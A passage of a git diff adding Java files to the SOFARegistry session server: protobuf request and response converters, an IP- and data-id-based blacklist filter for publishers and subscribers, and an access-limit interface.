baseRegisterBuilder + .setAppName(subscriberRegisterJava.getAppName()) + .setClientId(subscriberRegisterJava.getClientId()) + .setDataId(subscriberRegisterJava.getDataId()) + .setDataInfoId(subscriberRegisterJava.getDataInfoId()) + .setEventType(subscriberRegisterJava.getEventType()) + .setGroup(subscriberRegisterJava.getGroup()) + .setZone(subscriberRegisterJava.getZone()) + .setInstanceId(subscriberRegisterJava.getInstanceId()) + .setIp(subscriberRegisterJava.getIp()) + .setPort(subscriberRegisterJava.getPort()) + .setProcessId(subscriberRegisterJava.getProcessId()) + .setRegistId(subscriberRegisterJava.getRegistId()) + .setVersion(subscriberRegisterJava.getVersion()) + .setTimestamp(subscriberRegisterJava.getTimestamp()) + .putAllAttributes(subscriberRegisterJava.getAttributes()); + + builder + .setScope(subscriberRegisterJava.getScope()) + .setBaseRegister(baseRegisterBuilder.build()); + + return builder.build(); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/SyncConfigRequestConvertor.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/SyncConfigRequestConvertor.java new file mode 100644 index 000000000..8aaaef885 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/SyncConfigRequestConvertor.java @@ -0,0 +1,53 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.converter.pb; + +import com.alipay.sofa.registry.common.model.client.pb.SyncConfigRequestPb; +import com.alipay.sofa.registry.core.model.SyncConfigRequest; + +/** + * @author bystander + * @version $Id: SyncConfigRequestConvertor.java, v 0.1 2018年03月21日 2:07 PM bystander Exp $ + */ +public class SyncConfigRequestConvertor { + + public static SyncConfigRequest convert2Java(SyncConfigRequestPb syncConfigRequestPb) { + + if (syncConfigRequestPb == null) { + return null; + } + + SyncConfigRequest syncConfigRequest = new SyncConfigRequest(); + syncConfigRequest.setZone(syncConfigRequestPb.getZone()); + syncConfigRequest.setDataCenter(syncConfigRequestPb.getDataCenter()); + + return syncConfigRequest; + } + + public static SyncConfigRequestPb convert2Pb(SyncConfigRequest syncConfigRequestJava) { + + if (syncConfigRequestJava == null) { + return null; + } + + SyncConfigRequestPb.Builder builder = SyncConfigRequestPb.newBuilder(); + builder.setZone(syncConfigRequestJava.getZone()); + builder.setDataCenter(syncConfigRequestJava.getDataCenter()); + + return builder.build(); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/SyncConfigResponseConvertor.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/SyncConfigResponseConvertor.java new file mode 100644 index 000000000..e1900ffb6 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/converter/pb/SyncConfigResponseConvertor.java @@ -0,0 +1,68 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.converter.pb; + +import com.alipay.sofa.registry.common.model.client.pb.ResultPb; +import com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb; +import com.alipay.sofa.registry.core.model.SyncConfigResponse; + +/** + * @author bystander + * @version $Id: SyncConfigResponseConvertor.java, v 0.1 2018年03月21日 2:06 PM bystander Exp $ + */ +public final class SyncConfigResponseConvertor { + private SyncConfigResponseConvertor() {} + + public static SyncConfigResponse convert2Java(SyncConfigResponsePb syncConfigResponsePb) { + + if (syncConfigResponsePb == null) { + return null; + } + + SyncConfigResponse syncConfigResponse = new SyncConfigResponse(); + + syncConfigResponse.setAvailableSegments( + ListStringConvertor.convert2Java(syncConfigResponsePb.getAvailableSegmentsList())); + + syncConfigResponse.setRetryInterval(syncConfigResponsePb.getRetryInterval()); + syncConfigResponse.setMessage(syncConfigResponsePb.getResult().getMessage()); + syncConfigResponse.setSuccess(syncConfigResponsePb.getResult().getSuccess()); + + return syncConfigResponse; + } + + public static SyncConfigResponsePb convert2Pb(SyncConfigResponse syncConfigResponseJava) { + + if (syncConfigResponseJava == null) { + return null; + } + + SyncConfigResponsePb.Builder builder = SyncConfigResponsePb.newBuilder(); + builder.setRetryInterval(syncConfigResponseJava.getRetryInterval()); + builder.addAllAvailableSegments(syncConfigResponseJava.getAvailableSegments()); + + ResultPb.Builder resultPbBuilder = ResultPb.newBuilder(); + if (syncConfigResponseJava.getMessage() != null) { + resultPbBuilder.setMessage(syncConfigResponseJava.getMessage()); + } + resultPbBuilder.setSuccess(syncConfigResponseJava.isSuccess()); + + builder.setResult(resultPbBuilder.build()); + + return builder.build(); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/DataIdMatchStrategy.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/DataIdMatchStrategy.java new file mode 100644 index 000000000..33e0bf7cf --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/DataIdMatchStrategy.java @@ -0,0 +1,28 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.filter; + +import java.util.function.Supplier; + +/** + * @author shangyu.wh + * @version 1.0: DataIdMatchStrategy.java, v 0.1 2019-06-19 22:12 shangyu.wh Exp $ + */ +public interface DataIdMatchStrategy { + + boolean match(String dataId, Supplier getOperatorType); +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/IPMatchStrategy.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/IPMatchStrategy.java new file mode 100644 index 000000000..fde8a4aec --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/IPMatchStrategy.java @@ -0,0 +1,28 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.filter; + +import java.util.function.Supplier; + +/** + * @author shangyu.wh + * @version 1.0: IPMatchStrategy.java, v 0.1 2019-06-19 22:14 shangyu.wh Exp $ + */ +public interface IPMatchStrategy { + + boolean match(String IP, Supplier getOperatorType); +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/ProcessFilter.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/ProcessFilter.java new file mode 100644 index 000000000..a67ca44d4 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/ProcessFilter.java @@ -0,0 +1,26 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.filter; + +/** + * @author shangyu.wh + * @version 1.0: ProcessFilter.java, v 0.1 2019-06-19 17:01 shangyu.wh Exp $ + */ +public interface ProcessFilter { + + boolean match(T input); +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/blacklist/BlacklistConfig.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/blacklist/BlacklistConfig.java new file mode 100644 index 000000000..9367fba1f --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/blacklist/BlacklistConfig.java @@ -0,0 +1,80 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.filter.blacklist; + +import java.io.Serializable; +import java.util.List; + +/** + * @author shangyu.wh + * @version 1.0: BlacklistConfig.java, v 0.1 2019-06-19 17:23 shangyu.wh Exp $ + */ +public class BlacklistConfig implements Serializable { + + /** UID */ + private static final long serialVersionUID = -7607561981062791932L; + + /** blacklist type */ + private String type; + + /** match type */ + @SuppressWarnings("rawtypes") + private List matchTypes; + + /** + * Getter method for property type. + * + * @return property value of type + */ + public String getType() { + return type; + } + + /** + * Setter method for property type. + * + * @param type value to be assigned to property type + */ + public void setType(String type) { + this.type = type; + } + + /** + * Getter method for property matchTypes. + * + * @return property value of matchTypes + */ + @SuppressWarnings("rawtypes") + public List getMatchTypes() { + return matchTypes; + } + + /** + * Setter method for property matchTypes. + * + * @param matchTypes value to be assigned to property matchTypes + */ + @SuppressWarnings("rawtypes") + public void setMatchTypes(List matchTypes) { + this.matchTypes = matchTypes; + } + + @Override + public String toString() { + return "BlacklistConfig{" + "type='" + type + '\'' + ", match=" + matchTypes + '}'; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/blacklist/BlacklistConstants.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/blacklist/BlacklistConstants.java new file mode 100644 index 000000000..29160bf7a --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/blacklist/BlacklistConstants.java @@ -0,0 +1,36 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.filter.blacklist; + +/** + * @author shangyu.wh + * @version 1.0: BlacklistConstants.java, v 0.1 2019-06-19 17:56 shangyu.wh Exp $ + */ +public class BlacklistConstants { + + // *********************** Blacklist type ***********************// + /** forbidden pub */ + public static final String FORBIDDEN_PUB = "FORBIDDEN_PUB"; + + /** forbidden sub by prefix */ + public static final String FORBIDDEN_SUB_BY_PREFIX = "FORBIDDEN_SUB_BY_PREFIX"; + + // *********************** match type ***********************// + + /** match full ip */ + public static final String IP_FULL = "IP_FULL"; +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/blacklist/BlacklistManager.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/blacklist/BlacklistManager.java new file mode 100644 index 000000000..363199d92 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/blacklist/BlacklistManager.java @@ -0,0 +1,46 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.filter.blacklist; + +import java.util.List; +import java.util.Map; +import java.util.Set; + +/** + * @author shangyu.wh + * @version 1.0: BlacklistManager.java, v 0.1 2019-06-19 18:27 shangyu.wh Exp $ + */ +public interface BlacklistManager { + /** load list first */ + void load(); + + /** + * get list + * + * @return + */ + List getBlacklistConfigList(); + + /** + * convert blacklist map to blacklist config list + * + * @param config + * @return blacklistConfigMap key:blacklist type Map> key:MatchType set:match + * patterns + */ + Map>> convertBlacklistConfig(String config); +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/blacklist/BlacklistManagerImpl.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/blacklist/BlacklistManagerImpl.java new file mode 100644 index 000000000..6ee890e2f --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/blacklist/BlacklistManagerImpl.java @@ -0,0 +1,129 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.filter.blacklist; + +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.metaserver.ProvideData; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.shared.meta.MetaServerService; +import com.alipay.sofa.registry.util.ConcurrentUtils; +import com.alipay.sofa.registry.util.JsonUtils; +import com.alipay.sofa.registry.util.LoopRunnable; +import com.fasterxml.jackson.core.type.TypeReference; +import com.fasterxml.jackson.databind.ObjectMapper; +import java.util.*; +import java.util.Map.Entry; +import java.util.concurrent.TimeUnit; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author shangyu.wh + * @version 1.0: BlacklistManagerImpl.java, v 0.1 2019-06-19 18:30 shangyu.wh Exp $ + */ +public class BlacklistManagerImpl implements BlacklistManager { + + private static final Logger LOGGER = LoggerFactory.getLogger(BlacklistManagerImpl.class); + + @Autowired protected MetaServerService metaNodeService; + + volatile List blacklistConfigList = new ArrayList(); + + private final WatchDog watchDog = new WatchDog(); + + private final class WatchDog extends LoopRunnable { + + @Override + public void runUnthrowable() { + fetchBlackList(); + } + + @Override + public void waitingUnthrowable() { + ConcurrentUtils.sleepUninterruptibly(30, TimeUnit.SECONDS); + } + } + + @Override + public void load() { + fetchBlackList(); + ConcurrentUtils.createDaemonThread("BlacklistManager-load", watchDog).start(); + } + + @Override + public List getBlacklistConfigList() { + return blacklistConfigList; + } + + private void fetchBlackList() { + ProvideData provideData = metaNodeService.fetchData(ValueConstants.BLACK_LIST_DATA_ID); + String data = ProvideData.toString(provideData); + if (data != null) { + convertBlacklistConfig(data); + LOGGER.info("Fetch session blacklist data switch {} success!", data); + } else { + LOGGER.info("Fetch session blacklist data null,current config not change!"); + } + } + + /** @see BlacklistManager#convertBlacklistConfig(String) */ + public Map>> convertBlacklistConfig(String config) { + + TypeReference>>> typeReference = + new TypeReference>>>() {}; + + ObjectMapper mapper = JsonUtils.getJacksonObjectMapper(); + + Map>> blacklistConfigMap; + try { + blacklistConfigMap = mapper.readValue(config, typeReference); + } catch (Throwable e) { + LOGGER.error("Parser config json error!", e); + return null; + } + if (null == blacklistConfigMap) { + LOGGER.info("[cmd] setBlacklistConfig fail, params is null"); + return null; + } + try { + List blacklistConfigs = new ArrayList(); + for (Entry>> configEntry : blacklistConfigMap.entrySet()) { + BlacklistConfig blacklistConfig = new BlacklistConfig(); + blacklistConfig.setType(configEntry.getKey()); + + List matchTypeList = new ArrayList(); + + Map> matchTypeMap = configEntry.getValue(); + for (Entry> typeEntry : matchTypeMap.entrySet()) { + String type = typeEntry.getKey(); + + MatchType ipFullMatchType = new MatchType(); + ipFullMatchType.setType(type); + ipFullMatchType.setPatternSet(typeEntry.getValue()); + matchTypeList.add(ipFullMatchType); + } + blacklistConfig.setMatchTypes(matchTypeList); + blacklistConfigs.add(blacklistConfig); + } + this.blacklistConfigList = blacklistConfigs; + return blacklistConfigMap; + } catch (Throwable e) { + LOGGER.error("[cmd] setBlacklistConfig error", e); + return null; + } + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/blacklist/BlacklistMatchProcessFilter.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/blacklist/BlacklistMatchProcessFilter.java new file mode 100644 index 000000000..2707b041c --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/blacklist/BlacklistMatchProcessFilter.java @@ -0,0 +1,129 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.filter.blacklist; + +import com.alipay.sofa.registry.common.model.store.BaseInfo; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; +import com.alipay.sofa.registry.server.session.filter.DataIdMatchStrategy; +import com.alipay.sofa.registry.server.session.filter.IPMatchStrategy; +import com.alipay.sofa.registry.server.session.filter.ProcessFilter; +import java.util.List; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author shangyu.wh + * @version 1.0: BlacklistMatchProcessFilter.java, v 0.1 2019-06-19 22:01 shangyu.wh Exp $ + */ +public class BlacklistMatchProcessFilter implements ProcessFilter { + + @Autowired private DataIdMatchStrategy dataIdMatchStrategy; + + @Autowired private IPMatchStrategy ipMatchStrategy; + + @Autowired private BlacklistManager blacklistManager; + + @Autowired private SessionServerConfig sessionServerConfig; + + @Override + public boolean match(BaseInfo storeData) { + + final List configList = blacklistManager.getBlacklistConfigList(); + + // empty list proceed + if (null == configList || configList.size() == 0) { + return false; + } + + URL url = storeData.getSourceAddress(); + + if (url != null) { + + switch (storeData.getDataType()) { + case PUBLISHER: + if (dataIdMatchStrategy.match( + storeData.getDataId(), () -> sessionServerConfig.getBlacklistPubDataIdRegex())) { + return ipMatchStrategy.match( + url.getIpAddress(), () -> BlacklistConstants.FORBIDDEN_PUB); + } + case SUBSCRIBER: + if (dataIdMatchStrategy.match( + storeData.getDataId(), () -> sessionServerConfig.getBlacklistSubDataIdRegex())) { + return ipMatchStrategy.match( + url.getIpAddress(), () -> BlacklistConstants.FORBIDDEN_SUB_BY_PREFIX); + } + default: + return false; + } + } + return false; + } + + /** + * Getter method for property dataIdMatchStrategy. + * + * @return property value of dataIdMatchStrategy + */ + public DataIdMatchStrategy getDataIdMatchStrategy() { + return dataIdMatchStrategy; + } + + /** + * Setter method for property dataIdMatchStrategy. + * + * @param dataIdMatchStrategy value to be assigned to property dataIdMatchStrategy + */ + public void setDataIdMatchStrategy(DataIdMatchStrategy dataIdMatchStrategy) { + this.dataIdMatchStrategy = dataIdMatchStrategy; + } + + /** + * Getter method for property ipMatchStrategy. + * + * @return property value of ipMatchStrategy + */ + public IPMatchStrategy getIpMatchStrategy() { + return ipMatchStrategy; + } + + /** + * Setter method for property ipMatchStrategy. + * + * @param ipMatchStrategy value to be assigned to property ipMatchStrategy + */ + public void setIpMatchStrategy(IPMatchStrategy ipMatchStrategy) { + this.ipMatchStrategy = ipMatchStrategy; + } + + /** + * Getter method for property blacklistManager. + * + * @return property value of blacklistManager + */ + public BlacklistManager getBlacklistManager() { + return blacklistManager; + } + + /** + * Setter method for property blacklistManager. + * + * @param blacklistManager value to be assigned to property blacklistManager + */ + public void setBlacklistManager(BlacklistManager blacklistManager) { + this.blacklistManager = blacklistManager; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/blacklist/DefaultDataIdMatchStrategy.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/blacklist/DefaultDataIdMatchStrategy.java new file mode 100644 index 000000000..9c00a8cf7 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/blacklist/DefaultDataIdMatchStrategy.java @@ -0,0 +1,38 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.filter.blacklist; + +import com.alipay.sofa.registry.server.session.filter.DataIdMatchStrategy; +import java.util.function.Supplier; +import java.util.regex.Pattern; +import org.springframework.util.StringUtils; + +/** + * @author shangyu.wh + * @version 1.0: DefaultDataIdMatchStrategy.java, v 0.1 2019-06-19 22:15 shangyu.wh Exp $ + */ +public class DefaultDataIdMatchStrategy implements DataIdMatchStrategy { + + @Override + public boolean match(String dataId, Supplier getOperatorType) { + if (StringUtils.hasText(dataId) && StringUtils.hasText(getOperatorType.get())) { + // TODO pre compile pattern + return Pattern.matches(getOperatorType.get(), dataId); + } + return true; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/blacklist/DefaultIPMatchStrategy.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/blacklist/DefaultIPMatchStrategy.java new file mode 100644 index 000000000..12d46f4d2 --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/blacklist/DefaultIPMatchStrategy.java @@ -0,0 +1,78 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.filter.blacklist; + +import com.alipay.sofa.registry.server.session.filter.IPMatchStrategy; +import java.util.List; +import java.util.Set; +import java.util.function.Supplier; +import org.apache.commons.lang.StringUtils; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author shangyu.wh + * @version 1.0: DefaultIPMatchStrategy.java, v 0.1 2019-06-19 22:16 shangyu.wh Exp $ + */ +public class DefaultIPMatchStrategy implements IPMatchStrategy { + + @Autowired BlacklistManager blacklistManager; + + @Override + public boolean match(String IP, Supplier getOperatorType) { + return match(getOperatorType.get(), IP); + } + + private boolean match(String type, String matchPattern) { + + List configList = blacklistManager.getBlacklistConfigList(); + for (BlacklistConfig blacklistConfig : configList) { + + // 如黑名单类型不匹配则跳过 + if (!StringUtils.equals(type, blacklistConfig.getType())) { + continue; + } + + List matchTypeList = blacklistConfig.getMatchTypes(); + + // 匹配规则为空跳过 + if (null == matchTypeList || matchTypeList.size() == 0) { + continue; + } + + for (MatchType matchType : matchTypeList) { + if (null == matchType) { + continue; + } + + if (BlacklistConstants.IP_FULL.equals(matchType.getType())) { + // IP 全匹配时判断当前发布者IP是否在IP列表中,如命中则拒绝发布 + @SuppressWarnings("unchecked") + Set patterns = matchType.getPatternSet(); + + if (null == patterns || patterns.size() == 0) { + continue; + } + + if (patterns.contains(matchPattern)) { + return true; + } + } + } + } + return false; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/blacklist/MatchType.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/blacklist/MatchType.java new file mode 100644 index 000000000..c1332312f --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/filter/blacklist/MatchType.java @@ -0,0 +1,77 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.filter.blacklist; + +import java.io.Serializable; +import java.util.Set; + +/** + * @author shangyu.wh + * @version 1.0: MatchType.java, v 0.1 2019-06-19 17:25 shangyu.wh Exp $ + */ +public class MatchType implements Serializable { + /** UID */ + private static final long serialVersionUID = 4015181538538056685L; + + /** match type */ + private String type; + + /** match patterns */ + private Set patternSet; + + /** + * Getter method for property type. + * + * @return property value of type + */ + public String getType() { + return type; + } + + /** + * Setter method for property type. + * + * @param type value to be assigned to property type + */ + public void setType(String type) { + this.type = type; + } + + /** + * Getter method for property patternSet. + * + * @return property value of patternSet + */ + public Set getPatternSet() { + return patternSet; + } + + /** + * Setter method for property patternSet. + * + * @param patternSet value to be assigned to property patternSet + */ + public void setPatternSet(Set patternSet) { + this.patternSet = patternSet; + } + + /** @see Object#toString() */ + @Override + public String toString() { + return "MatchType{" + "type='" + type + '\'' + ", patternSet=" + patternSet + '}'; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/limit/AccessLimitService.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/limit/AccessLimitService.java new file mode 100644 index 000000000..7e2646abf --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/limit/AccessLimitService.java @@ -0,0 +1,25 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.limit; + +/** + * @author shangyu.wh + * @version 1.0: AccessLimitService.java, v 0.1 2019-08-26 20:35 shangyu.wh Exp $ + */ +public interface AccessLimitService { + boolean tryAcquire(); +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/limit/AccessLimitServiceImpl.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/limit/AccessLimitServiceImpl.java new file mode 100644 index 000000000..28b7cf21f --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/limit/AccessLimitServiceImpl.java @@ -0,0 +1,38 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ 